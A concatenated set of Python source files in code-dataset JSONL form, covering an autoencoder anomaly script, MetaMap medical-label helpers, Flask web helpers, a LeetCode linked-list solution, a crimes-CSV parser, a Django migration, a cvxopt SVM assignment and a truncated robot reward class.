number\r\n allow_growth=True)\r\n )\r\n\r\n input_shape = (args.height, args.width, args.channel)\r\n\r\n autoencoder = AutoEncoder(input_shape, args.latent_dim,\r\n is_training=False,\r\n channel=args.channel)\r\n discriminator = Discriminator(is_training=False)\r\n\r\n aae = AAE(autoencoder, discriminator, is_training=False)\r\n aae.restore(args.model_path)\r\n\r\n result_dir_inlier = os.path.join(args.result_dir, \"decoded/inlier\")\r\n result_dir_outlier = os.path.join(args.result_dir, \"decoded/outlier\")\r\n\r\n image_sampler = ImageSampler(target_size=(args.width, args.height),\r\n channel=args.channel,\r\n is_training=False)\r\n\r\n data_generator_inlier = image_sampler.flow_from_csv(args.ok_csv_path, args.ok_image_dir, args.batch_size, shuffle=False, nb_sample=args.ok_test_nb_sample)\r\n df_inlier = get_encoded_save_decoded(aae,\r\n data_generator_inlier,\r\n args.latent_dim,\r\n result_dir_inlier,\r\n label='inlier',\r\n nb_visualize=args.nb_visualize_batch)\r\n\r\n data_generator_outlier = image_sampler.flow_from_csv(args.ng_csv_path, args.ng_image_dir, args.batch_size, shuffle=False, nb_sample=args.ng_test_nb_sample)\r\n df_outlier = get_encoded_save_decoded(aae,\r\n data_generator_outlier,\r\n args.latent_dim,\r\n result_dir_outlier,\r\n label='outlier',\r\n nb_visualize=args.nb_visualize_batch)\r\n\r\n df = pd.concat([df_inlier, df_outlier], ignore_index=True)\r\n os.makedirs(args.result_dir, exist_ok=True)\r\n df.to_csv(os.path.join(args.result_dir, \"output.csv\"), index=False)\r\n\r\n\r\ndef get_encoded_save_decoded(model, data_generator, latent_dim, result_dir, label, nb_visualize):\r\n os.makedirs(result_dir, exist_ok=True)\r\n df = None\r\n\r\n for index, image_batch in enumerate(data_generator()):\r\n print('Processing ... [{} / {}]'.format(index*data_generator.batch_size, data_generator.n), end='\\r')\r\n current_df = data_generator.current_df\r\n encoded_batch = model.predict_latent_vectors_on_batch(image_batch)\r\n decoded_batch = model.predict_on_batch(image_batch)\r\n\r\n # store dataframe\r\n dict_ = dict(zip(['z_{}'.format(ld) for ld in range(latent_dim)],\r\n [encoded_batch[:, ld] for ld in range(latent_dim)]))\r\n current_df = current_df.assign(**dict_)\r\n zeros = np.zeros_like(encoded_batch)\r\n distances = np.array([get_distance(e, z) for e, z in zip(encoded_batch, zeros)])\r\n current_df = current_df.assign(\r\n distance=distances,\r\n label=label\r\n )\r\n\r\n if index == 0:\r\n df = current_df\r\n else:\r\n df = pd.concat([df, current_df])\r\n return df\r\n\r\n\r\ndef get_distance(v1, v2):\r\n return np.sqrt(np.sum([(x - y) ** 2 for (x, y) in zip(v1, v2)]))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"solder/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":5068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"262886871","text":"\"\"\"\nmetamap_helpers.py\nScope: Helper functions for interacting with metamap\nAuthors: Evan French\n\"\"\"\nfrom pymetamap import MetaMap, ConceptMMI\nfrom classes import Annotation\n\n#Author: Evan French\n#MetaMap semantic types corresponding to medical tests\ntests = [\n'amas', #Amino Acid Sequence\n'mbrt', #Molecular Biology Research Technique\n'edac', #Educational Activity\n'irda', #Indicator, Reagent, or Diagnostic Aid\n'ffas', #Fully Formed Anatomical Structure\n'ocdi', #Occupation or Discipline\n'elii', #Element, Ion, or Isotope\n'enty', #Entity\n'comd', #Cell or Molecular Dysfunction\n'vita', #Vitamin\n'nnon', #Nucleic Acid, Nucleoside, or Nucleotide\n'lbpr', #Laboratory Procedure\n]\n\n#Author: Evan French\n#MetaMap semantic types corresponding to medical treatments\ntreatments = [\n'clnd', #Clinical Drug\n'drdd', #Drug Delivery Device\n'orgt', #Organization\n'bodm', #Biomedical or Dental Material\n'mcha', #Machine Activity\n'food', #Food\n'hcpp', #Human-caused Phenomenon or Process\n'tisu', #Tissue\n'topp', #Therapeutic or Preventive Procedure\n'genf', #Genetic Function\n'antb', #Antibiotic\n'medd', #Medical Device\n'acty', #Activity\n'bdsu', #Body Substance\n'bsoj', #Body Space or Junction\n'bpoc', #Body Part, Organ, or Organ Component\n'popg', #Population Group\n'orgf', #Organism Function\n'plnt', #Plant\n'biof', #Biologic Function\n'mamm', #Mammal\n'blor', #Body Location or Region\n'spco', #Spatial Concept\n'anst', #Anatomical Structure\n'gora', #Governmental or Regulatory Activity\n'hlca', #Health Care Activity\n]\n\n#Author: Evan French\n#MetaMap semantic types corresponding to medical problems\nproblems = [\n'grpa', #Group Attribute\n'amph', #Amphibian\n'mobd', #Mental or Behavioral Dysfunction\n'bhvr', #Behavior\n'aggp', #Age Group\n'inpo', #Injury or Poisoning\n'lang', #Language\n'dsyn', #Disease or Syndrome\n]\n\n#Author: Evan French\ndef GetMetamapLabel(semTypeList, testList = None, treatmentList = None, problemList = None):\n \"\"\"\n Returns a predicted label for the list of MetaMap semantic types.\n All semantic types in the input list must be in a single 'master' list (see problems, tests, treatments above) \n to be assigned a label other than 'none'.\n\n @param semTypeList: list of sematic type abbreviations\n @return: predicted label (problem, test, treatment, or none)\n \"\"\"\n # Use parameters if provided, otherwise default to hardcodes\n testList = testList if testList != None else tests\n treatmentList = treatmentList if treatmentList != None else treatments\n problemList = problemList if problemList != None else problems\n\n #Default label is 'none'\n label = \"none\"\n \n semTypeSet = set(semTypeList)\n\n if not semTypeSet.isdisjoint(problemList) and semTypeSet.isdisjoint(testList) and semTypeSet.isdisjoint(treatmentList):\n label = \"problem\"\n elif semTypeSet.isdisjoint(problemList) and not semTypeSet.isdisjoint(testList) and semTypeSet.isdisjoint(treatmentList):\n label = \"test\"\n elif semTypeSet.isdisjoint(problemList) and semTypeSet.isdisjoint(testList) and not semTypeSet.isdisjoint(treatmentList):\n label = \"treatment\"\n \n return label\n\ndef CheckAnnotationAgainstSemTypes(annotation, semTypes, testList = None, treatmentList = None, problemList = None):\n \"\"\"\n Checks if the label on an annoation matches the predicted label from list of semantic types.\n\n @param annotation: An Annotation object\n @param semTypes: List of semantic types abbreviations\n @return: True if the labels match and label is not 'none', false otherwise\n \"\"\"\n mm_label = GetMetamapLabel(semTypes, testList, treatmentList, problemList)\n isSilver = mm_label != 'none' and annotation.label == mm_label\n return isSilver, mm_label\n\n#Author: Evan French\ndef GetMetaMapSemanticTypes(metamap_path, annotations):\n \"\"\"\n Uses MetaMap to return a list of sematic types for each annotation\n\n @param metamap_path: Path to MetaMap installation\n @param annotations: List of concepts parsed from annotation file\n @return: List of lists of sematic types for each annotation\n \"\"\"\n #Extract concepts from the list of annotations using MetaMap\n metamap = MetaMap.get_instance(metamap_path)\n indexes = range(len(annotations))\n concepts, error = metamap.extract_concepts(annotations, indexes)\n\n #List to hold a list of semantic types for each annotation\n anSemTypeList = [[] for x in range(len(annotations))]\n\n #Iterate over the list of concepts extracted from the list of annotations\n for concept in concepts:\n index = int(concept.index)\n if isinstance(concept, ConceptMMI):\n for semtype in concept.semtypes.strip('[]').split(','):\n if semtype not in anSemTypeList[index]:\n #Create a list of unique semantic types per annotation\n anSemTypeList[index].append(semtype)\n \n return anSemTypeList\n","sub_path":"metamap_helpers.py","file_name":"metamap_helpers.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"509122191","text":"import datetime\n\nfrom flask import flash, request\n\nfrom scrobbler import app, db, login_manager, __VERSION__\nfrom scrobbler.webui.consts import PERIODS\nfrom scrobbler.models import User\n\n\n@app.template_filter('timesince')\ndef timesince(time, now=None):\n chunks = (\n (60 * 60 * 24 * 365, 'year'),\n (60 * 60 * 24 * 30, 'month'),\n (60 * 60 * 24 * 7, 'week'),\n (60 * 60 * 24, 'day'),\n (60 * 60, 'hour'),\n (60, 'minute'),\n (1, 'second')\n )\n\n if not now:\n now = datetime.datetime.now().replace(tzinfo=time.tzinfo)\n\n delta = now - (time - datetime.timedelta(0, 0, time.microsecond))\n since = delta.days * 24 * 60 * 60 + delta.seconds\n if since <= 0:\n return 'in the future'\n for i, (seconds, name) in enumerate(chunks):\n count = since // seconds\n if count != 0:\n break\n\n if count > 1:\n name += 's'\n\n return '%(number)d %(type)s ago' % {'number': count, 'type': name}\n\n\n@app.template_filter('bignum')\ndef bignum(num):\n magnitude = 0\n while abs(num) >= 1000:\n magnitude += 1\n num /= 1000.0\n # add more suffixes if you need them\n return '%.2f%s' % (num, ['', 'K', 'M'][magnitude]) if magnitude > 0 else num\n\n\n@app.context_processor\ndef periods():\n return {'PERIODS': PERIODS}\n\n\n@app.context_processor\ndef project_version():\n return {'PROJECT_VERSION': __VERSION__}\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return db.session.query(User).get(user_id)\n\n\ndef show_form_errors(form):\n for field, errors in form.errors.items():\n for error in errors:\n flash(u\"<b>{}</b>: {}\".format(getattr(form, field).label.text, error), 'error')\n\n\ndef get_argument(arg_name, arg_type=None, default=0):\n arg_type = arg_type or int\n\n try:\n return arg_type(request.args.get(arg_name))\n except (TypeError, ValueError):\n return default\n\n\ndef range_to_datetime(s_from, s_to):\n try:\n dt_from = datetime.datetime.strptime(s_from, '%Y-%m-%d')\n except ValueError:\n dt_from = datetime.datetime.strptime(s_from, '%Y-%m-%d %H:%M:%S')\n\n try:\n dt_to = datetime.datetime.strptime(s_to, '%Y-%m-%d')\n dt_to = dt_to + datetime.timedelta(days=1) - datetime.timedelta(microseconds=1)\n except ValueError:\n dt_to = datetime.datetime.strptime(s_to, '%Y-%m-%d %H:%M:%S')\n\n return (dt_from, dt_to)\n","sub_path":"scrobbler/webui/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"183635706","text":"\"\"\"\n给定两个(单向)链表,判定它们是否相交并返回交点。请注意相交的定义基于节点的引用,而不是基于节点的值。换句话说,如果一个链表的第k个节点与另一个链表的第j个节点是同一节点(引用完全相同),则这两个链表相交。\n\n示例 1:\n 输入:intersectVal = 8, listA = [4,1,8,4,5], listB = [5,0,1,8,4,5], skipA = 2, skipB = 3\n 输出:Reference of the node with value = 8\n 输入解释:相交节点的值为 8 (注意,如果两个列表相交则不能为 0)。从各自的表头开始算起,链表 A 为 [4,1,8,4,5],链表 B 为 [5,0,1,8,4,5]。在 A 中,相交节点前有 2 个节点;在 B 中,相交节点前有 3 个节点。\n\n示例 2:\n 输入:intersectVal = 2, listA = [0,9,1,2,4], listB = [3,2,4], skipA = 3, skipB = 1\n 输出:Reference of the node with value = 2\n 输入解释:相交节点的值为 2 (注意,如果两个列表相交则不能为 0)。从各自的表头开始算起,链表 A 为 [0,9,1,2,4],链表 B 为 [3,2,4]。在 A 中,相交节点前有 3 个节点;在 B 中,相交节点前有 1 个节点。\n\n示例 3:\n 输入:intersectVal = 0, listA = [2,6,4], listB = [1,5], skipA = 3, skipB = 2\n 输出:null\n 输入解释:从各自的表头开始算起,链表 A 为 [2,6,4],链表 B 为 [1,5]。由于这两个链表不相交,所以 intersectVal 必须为 0,而 skipA 和 skipB 可以是任意值。\n 解释:这两个链表不相交,因此返回 null。\n\n注意:\n 如果两个链表没有交点,返回 null 。\n 在返回结果后,两个链表仍须保持原有的结构。\n 可假定整个链表结构中没有循环。\n 程序尽量满足 O(n) 时间复杂度,且仅用 O(1) 内存。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/intersection-of-two-linked-lists-lcci\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\ndef NodeListBuilder(nums):\n if len(nums) == 0:\n return None\n else:\n head = ListNode(nums[0])\n last = head\n for i in range(1, len(nums)):\n new_node = ListNode(nums[i])\n last.next = new_node\n last = new_node\n return head\n\n\ndef NodeListPrinter(head):\n node_list = []\n while head != None:\n node_list.append(str(head.val))\n head = head.next\n return ('->').join(node_list)\n\n\ndef getIntersectionNode(headA, headB):\n # 历遍两个链表得到它们的长度及尾部node的索引\n if headA == None or headB == None:\n return None\n l1 = 1\n p1 = headA\n while p1.next != None:\n l1 += 1\n p1 = p1.next\n\n l2 = 1\n p2 = headB\n while p2.next != None:\n l2 += 1\n p2 = p2.next\n\n pa = headA\n pb = headB\n\n # 判断索引是否相同\n if p1 == p2:\n if l1 > l2:\n for i in range(l1 - l2):\n pa = pa.next\n elif l2 > l1:\n for i in range(l2 - l1):\n pb = pb.next\n while pa != None and pb != None:\n if pa == pb:\n return pa\n else:\n pa = pa.next\n pb = pb.next\n return None\n else:\n return None\n\n\nlist_common = NodeListBuilder([8, 4, 5])\n\nlistA = ListNode(4)\nnode1 = ListNode(1)\nlistA.next = node1\nnode1.next = list_common\n\nlistB = ListNode(5)\nnode2 = ListNode(0)\nnode3 = ListNode(1)\nlistB.next = node2\nnode2.next = node3\nnode3.next = list_common\n\nprint(NodeListPrinter(getIntersectionNode(listA, listB)))\n\n","sub_path":"程序员面试金典/02.07. 链表相交.py","file_name":"02.07. 链表相交.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"572752676","text":"def swap (var1, var2):\n print(var2+\",\"+var1+\". Hello!\")\n return\n \ndef pig (var1, var2):\n print(var1[1:] + var1[0] + \"ay\", end = \" \")\n print(var2[1:] + var2[0] + \"ay\", end = \" \")\n return\n\nfirstname = input(\"Please enter your first name:\")\nlastname = input(\"Please enter your last name:\")\nswap(firstname,lastname);\nanswer = input(\"Would you like your name displayed in Pig Latin?\")\nif (answer.lower() == \"yes\"):\n pig(firstname,lastname);\nelse:\n print(\"Have a wonderful day \"+firstname+\",\"+lastname)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"236908142","text":"\"\"\"\n1. Необходимо сделать отчет по каждому из известнх преступников: Загрузите информацию из файла в следующую структуру:\nСловарь, ключами в котором являются имена преступников, каждому из\nкоторых соответствует список со всеми их дениями, каждое из которых является словарем\n\nДалее с помощью модуля json выведите на экран даный словарь\n\n(Деяния неизвестных преступников обьедените в список и поместите в свой словарь с ключом \"-\")\n\n10 баллов\n10 минут\n\"\"\"\nfrom json import loads,dumps\ndct = {}\nwith open(\"Crimes.csv\", \"r\") as file:\n keys = file.readline().strip(\"\\n\").split(\",\")\n print(keys)\n for line in file:\n lst = line.strip(\"\\n\").split(\",\")\n print(lst)\n if lst[5] not in dct:\n dct[lst[5]] = []\n for i in range(9):\n try:\n lst[i] = int(lst[i])\n except ValueError:\n pass\n dct[lst[5]].append({\n keys[0]: lst[0],\n keys[1]: lst[1],\n keys[2]: lst[2],\n keys[3]: lst[3],\n keys[4]: lst[4],\n keys[6]: lst[6],\n keys[7]: lst[7],\n keys[8]: lst[8]\n })\nwith open(\"Info.txt\", \"w\") as file:\n file.write(dumps(dct))\nprint(dumps(dct, indent=4))","sub_path":"The crimes/Task_1.py","file_name":"Task_1.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"422193122","text":"from flask import (\n Blueprint, flash, g, redirect, session, render_template, request, url_for\n)\nfrom werkzeug.exceptions import abort\n\nfrom fedsdm.auth import login_required\nfrom fedsdm.db import get_db\nfrom fedsdm.ui.utils import get_mtconns, get_num_properties, get_num_rdfmts, get_datasources, get_federations\n\nbp = Blueprint('dashboard', __name__)\n\n\n@bp.route('/')\n@login_required\ndef stats():\n db = get_db()\n # feds = db.execute(\n # 'SELECT f.uri as feduri'\n # ' FROM federation f '\n # ' JOIN user u ON f.owner_id = u.id '\n # ).fetchall()\n\n sourceids = []\n datasources = {}\n rdfmts = 0\n links = 0\n stats = {}\n feds = get_federations(g.default_graph)\n if 'fed' in session:\n if session['fed'] not in [f['uri'] for f in feds]:\n del session['fed']\n for f in feds:\n graph = f['uri']\n dss = get_datasources(graph)\n datasources.update(dss)\n sourceids.extend(list(dss.keys()))\n mts = get_num_rdfmts(graph)\n rdfmts += mts\n lks = get_mtconns(graph)\n links += lks\n stats[f['uri']] = []\n for s in list(dss.keys()):\n nummts = get_num_rdfmts(graph, s)\n datasources[s]['rdfmts'] = nummts\n props = get_num_properties(graph, s)\n datasources[s]['properties'] = props\n linkss = get_mtconns(graph, s)\n datasources[s]['links'] = linkss\n stat = {\"rdfmts\": nummts,\n \"links\": linkss,\n \"triples\": datasources[s]['triples'] if 'triples' in datasources[s] else -1,\n \"properties\": props,\n \"source\": datasources[s]['source']}\n stats[f['uri']].append(stat)\n\n\n stat = {\n \"rdfmts\": rdfmts,\n \"sources\": len(set(sourceids)),\n \"federations\": len(feds),\n \"links\": links}\n\n datasourcesstat = list(datasources.values())\n\n g.stats = stats\n\n return render_template('dashboard/index.html', dsstats=datasourcesstat,\n fedstats=stat)\n\n","sub_path":"fedsdm/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"463478439","text":"import numpy as np\nfrom cvxopt import matrix\nfrom cvxopt import solvers\nimport csv\nimport time\nfrom numpy import linalg as la\nimport math\n# from svmutil import *\nimport sys\nimport sklearn.metrics\n# X = []\n# Y = []\n# X_test = []\n# Y_test = []\n\ntrain = sys.argv[1]\ntest = sys.argv[2]\npart = sys.argv[3]\n\n# time_gap = float(sys.argv[4])\n\n\n\nXq1 = []\nYq1 = []\nXq1_test = []\nYq1_test = []\n\nnum = 5\n\nstart1 = time.time()\n\n# train = \"mnist/train.csv\"\n# test = \"mnist/test.csv\"\n\nwith open(train) as fileX:\n\tx_reader = csv.reader(fileX)\n\tfor row in x_reader:\n\t\tif float(row[784])==num or float(row[784])==num+1: \n\t\t\ttemp = []\n\t\t\tfor i in range(784):\n\t\t\t\ttemp.append(float(row[i])/255)\n\t\t\t# Y.append(float(row[784]))\n\t\t\t# X.append(temp)\n\t\t\tif(float(row[784])==num):\n\t\t\t\tYq1.append(1)\n\t\t\t\tXq1.append(temp)\n\t\t\tif(float(row[784])==num+1):\n\t\t\t\tYq1.append(-1)\n\t\t\t\tXq1.append(temp)\n\nwith open(test) as fileX:\n\tx_reader = csv.reader(fileX)\n\tfor row in x_reader:\n\t\tif float(row[784])==num or float(row[784])==num+1: \n\t\t\ttemp = []\n\t\t\tfor i in range(784):\n\t\t\t\ttemp.append(float(row[i])/255)\n\t\t\t# Y.append(float(row[784]))\n\t\t\t# X.append(temp)\n\t\t\tif(float(row[784])==num):\n\t\t\t\tYq1_test.append(1)\n\t\t\t\tXq1_test.append(temp)\n\t\t\tif(float(row[784])==num+1):\n\t\t\t\tYq1_test.append(-1)\n\t\t\t\tXq1_test.append(temp)\n\nend1 = time.time()\nprint(\"Input done, Time taken\", end1-start1)\nstart2 = time.time()\nalpha_count = len(Xq1)\n\n\n# if(part==\"c\"):\n# \tx_svm, y_svm = Xq1, Yq1\n\n# \tprob = svm_problem(y_svm, x_svm)\n# \tparam = svm_parameter('-t 2 -c 1 -b 0 -g 0.05 -q')\n# \tm = svm_train(prob, param, '-q')\n# \tp_label, p_acc, p_val = svm_predict(Yq1_test, Xq1_test, m, '-b 0 -q')\n# \t# print(\"Accuracy using LIBSVM: \", p_acc)\n# \tACC, MSE, SCC = evaluations(Yq1_test, p_label)\n# \tprint(\"Accuracy using LIBSVM: \", ACC)\n# \talpha_libsvm = m.get_sv_coef()\n# \tSV_indices = m.get_sv_indices()\n# \talpha_svm = []\n# \tj=0\n# \tfor i in range(len(Yq1_test)):\n# \t\tif(i==SV_indices[j]):\n# \t\t\talpha_svm.append(alpha_libsvm[j][0])\n# \t\t\tj+=1\n# \t\telse:\n# \t\t\talpha_svm.append(0)\n\n# \t# exit(0)\n# \t# return \n\n# print(len(Xq1))\n# print(len(Yq1))\n# print(len(Xq1_test))\n# print(len(Yq1_test))\n\ndef linear_kernel(x,y):\n\treturn np.inner(x,y)\n\ngamma = 0.05\n\ndef guassian_kernel(x,y):\n\ttempmat = np.zeros((alpha_count, alpha_count))\n\tfor i in range(alpha_count):\n\t\tfor j in range(i, alpha_count):\n\t\t\tnormsq = (la.norm(np.array(Xq1[i])- np.array(Xq1[j])))\n\t\t\ttempmat[i][j] = np.exp((-1)*((normsq**2)*(gamma)))\n\t\t\ttempmat[j][i] = tempmat[i][j]\n\treturn tempmat\n\ndef guas(x,z):\n\tnormsq = (la.norm(np.array(x)- np.array(z)))\n\treturn math.exp((-1)*((normsq**2)*(gamma)))\n\t\t\t\n\n# alpha_count = 10\n#######################################################\nq1 = np.ones((alpha_count, 1))*-1\n#######################################################\n# P1 = np.zeros((alpha_count, alpha_count))\n# for i in range(alpha_count):\n# \tfor j in range(i, alpha_count):\n# \t\tP1[i][j]=Yq1[i]*Yq1[j]*np.inner(Xq1[i],Xq1[j])\n# \t\tP1[j][i] = P1[i][j]\nmatXq1 = np.array(Xq1)\nmatYq1 = np.array([Yq1])\nif(part==\"a\"):\n\tP1 = linear_kernel(matXq1, matXq1)\nelif(part==\"b\"):\n\t# P1 = guassian_kernel(matXq1, matXq1)\n\tP1 = sklearn.metrics.pairwise.rbf_kernel(Xq1, Xq1, gamma=0.05)\n\nP1 = P1*((matYq1.transpose()).dot(matYq1))\n# print(matY)\n\n# print(\"inner product done\")\n#######################################################\nA1 = np.zeros((1,alpha_count))\nfor i in range(alpha_count):\n\tA1[0][i] = Yq1[i] \n\n#######################################################\ntemp1 = np.identity(alpha_count)*(-1)\ntemp2 = np.identity(alpha_count)\nG1 = np.concatenate((temp1, temp2), axis=0)\n\n#######################################################\nC = 1.0\ntemp1 = np.zeros((alpha_count,1))\ntemp2 = np.ones((alpha_count,1))*C\nh1 = np.concatenate((temp1, temp2), axis=0)\n#######################################################\n# b1 = np.array([[0]])\nb1 = np.zeros((1,1))\n# print(b1.shape)\n\nP = matrix(P1)\nq = matrix(q1)\nG = matrix(G1)\nh = matrix(h1)\nA = matrix(A1)\nb = matrix(b1)\n\n\nend2 = time.time()\nprint(\"Matrices Made, Time taken\", end2-start2)\n\nsolvers.options[\"show_progress\"] = False\n\nstart3 = time.time()\nsolution = solvers.qp(P,q,G,h,A,b)\n# print(solution['status'])\n# print(solution['x'])\nalphas_q1 = np.array(solution['x'])\n# print(solution['primal objective'])\n\nend3 = time.time()\nprint(\"Solved, Time taken\", end3-start3)\n\n# print(len(Xq1))\n# print(matXq1.shape)\n# print(alphas_q1)\nSV = []\nfor i in range(alphas_q1.shape[0]):\n\tif alphas_q1[i][0]<C and alphas_q1[i][0]>1e-5:\n\t\tSV.append(i)\n\n\n\n\nWq1 = (matXq1.transpose()).dot(alphas_q1*(matYq1.transpose()))\nbq1 = Yq1[SV[0]] - (Wq1.transpose().dot(matXq1[SV[0]])) \n\n# print(\"w\")\n# print(Wq1)\n# print(\"b\")\n# print(bq1)\n# print(SV)\n\nmatXq1_test = np.array(Xq1_test)\nmatYq1_test = np.array([Yq1_test]).transpose()\n\nmatXq1 = np.array(Xq1)\nmatYq1 = np.array([Yq1]).transpose()\n\n\nif(part==\"a\"):\n\tpredictionYq1_test = matXq1_test.dot(Wq1) + bq1\n\tpredictionYq1_train = matXq1.dot(Wq1) + bq1\n\n\tcount_test = 0\n\tfor i in range(len(Yq1_test)):\n\t\tpred =0\n\t\tif(predictionYq1_test[i][0]>=0):\n\t\t\tpred = 1\n\t\telse:\n\t\t\tpred = -1\n\t\tif(pred==Yq1_test[i]):\n\t\t\tcount_test+=1\n\n\n\t# count_train = 0\n\t# for i in range(len(Yq1)):\n\t# \tpred =0\n\t# \tif(predictionYq1_train[i][0]>=0):\n\t# \t\tpred = 1\n\t# \telse:\n\t# \t\tpred = -1\n\t# \tif(pred==Yq1[i]):\n\t# \t\tcount_train+=1\n\n\n\tprint(\"No. of Support Vectors: \", len(SV))\n\n\tprint(\"Total correct(in test): \", count_test)\n\tprint(\"Total test(in test): \", len(Yq1_test))\n\tprint(\"Accuracy using Linear kernel(test set): \", count_test/len(Yq1_test)*100)\n\n\n\t# print(\"Total correct(in train): \", count_train)\n\t# print(\"Total test(in train): \", len(Yq1))\n\t# print(\"Accuracy using Linear kernel(training set): \", count_train/len(Yq1)*100)\n\t# print(\"No. of Support Vectors: \", len(SV))\n\nif(part==\"b\"):\n\tpredictionYq1_gaus = []\n\n\ttemp_x_guas = []\n\ttemp_alpha_y = []\n\n\tfor j in range(len(SV)):\n\t\tkernel = guas(Xq1[SV[j]], Xq1[SV[0]])\n\t\ttemp_x_guas.append(kernel)\n\t\ttemp_alpha_y.append(alphas_q1[SV[j]]*Yq1[SV[j]])\n\n\ttemp_row = np.array([temp_x_guas])\n\ttemp_col = np.array([temp_alpha_y]).transpose()\n\tb_gaus = Yq1[SV[0]] - temp_row.dot(temp_col) \n\t# print(\"b for guassian\", b_gaus)\n\n\n\tfor i in range(len(Yq1_test)):\n\t\tx_guas = []\n\t\talpha_y = []\n\t\tfor j in range(len(SV)):\n\t\t\tkernel = guas(Xq1[SV[j]], Xq1_test[i])\n\t\t\tx_guas.append(kernel)\n\t\t\talpha_y.append(alphas_q1[SV[j]]*Yq1[SV[j]])\n\t\ttemp_row = np.array([x_guas])\n\t\ttemp_col = np.array([alpha_y]).transpose()\n\t\tpred = temp_row.dot(temp_col) + b_gaus\n\t\t# print(\"Pred: \", pred)\n\t\t# print(\"minus: \", pred-b_gaus)\n\t\tpredictionYq1_gaus.append(pred)\n\n\tcount_gaus = 0\n\tfor i in range(len(Yq1_test)):\n\t\tpred =0\n\t\tif(predictionYq1_gaus[i]>=0):\n\t\t\tpred = 1\n\t\telse:\n\t\t\tpred = -1\n\t\tif(pred==Yq1_test[i]):\n\t\t\tcount_gaus+=1\n\n\tprint(\"Total correct: \", count_gaus)\n\tprint(\"Total test: \", len(Yq1_test))\n\tprint(\"Accuracy using Guassian Kernel: \", (count_gaus/len(Yq1_test))*100)\n\tprint(\"No. of Support Vectors: \", len(SV))\n\n\n\n\n# print(type(alpha_svm))\n# print(type(SV_indices))\n# print((alpha_svm))\n# print((SV_indices))\n","sub_path":"2016CS10355_Sachin_Prajapati/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":6984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"148686848","text":"from django.contrib import admin\nfrom django.urls import path, include\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/v1/', include([\n path('auth/', include('rest_framework.urls')),\n path('blog/', include('blog.api.urls')),\n ]))\n]\n","sub_path":"app/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"408003396","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('microdevices', '0002'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='OrganModelProtocol',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('version', models.CharField(max_length=20)),\n ('file', models.FileField(upload_to=b'protocols', verbose_name=b'Protocol File')),\n ('organ_model', models.ForeignKey(verbose_name=b'Organ Model', to='microdevices.OrganModel', on_delete=models.CASCADE)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RemoveField(\n model_name='organmodel',\n name='protocol',\n ),\n migrations.AlterField(\n model_name='organmodel',\n name='device',\n field=models.ForeignKey(to='microdevices.Microdevice', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.RemoveField(\n model_name='microdevice',\n name='device_fluid_volume_unit',\n ),\n migrations.AlterField(\n model_name='microdevice',\n name='device_fluid_volume',\n field=models.FloatField(null=True, verbose_name=b'device fluid volume (uL)', blank=True),\n preserve_default=True,\n ),\n migrations.AlterUniqueTogether(\n name='organmodelprotocol',\n unique_together=set([('version', 'organ_model')]),\n ),\n ]\n","sub_path":"microdevices/migrations/0003.py","file_name":"0003.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"332819972","text":"from baseline_utils import *\n\nclass GT_Reward_Expert:\n\t\"\"\"\n\tThis class contains an environment with the GT reward and is used to simulate near-optimal demonstrations.\n\n\tIniti:\n\tgt_weights\t\tList of weights for the feat_list features\n\tfeat_list\t\tList of strings with the active features\n\tgen\t\t\t\tThe mode with which induced near optimal trajectories with the GT cost are calculated\n\t \t\t\t\tcan be 'waypt' (get TrajOpt optimal trajectory and perturb waypoints)\n\t \t\t\t\tor 'cost' (perturb the cost function slightly and get TrajOpt optimal trajectories for all of them)\n\n\tstarts\t\t\tlist of start positions\n\tgoals\t\t\tlist of goal positions\n\tgoal_poses\t\tList of goal poses OR default None\n\tcombi\t\t\tIf True: take all combinations of start & goal pairs\n\tT, timestep\t\tSettings for TrajOpt\n\n\tobj_center_dict\tDict of human & laptop positions used when calculating the feature values\n\tfeat_range_dict\tDict of factors for the different features to scale them to 0-1. -> used to calculate feature values\n\n\t\"\"\"\n\n\tdef __init__(self, feat_list, gt_weights, gen, starts, goals, goal_poses=None, combi=False, T=20., timestep=0.5,\n\t\t\t\t obj_center_dict = {'HUMAN_CENTER': [-0.6, -0.55, 0.0], 'LAPTOP_CENTER': [-0.8, 0.0, 0.0]},\n\t\t\t\t feat_range_dict = {'table': 0.98, 'coffee': 1.0, 'laptop': 0.3, 'human': 0.3, 'efficiency': 0.22, 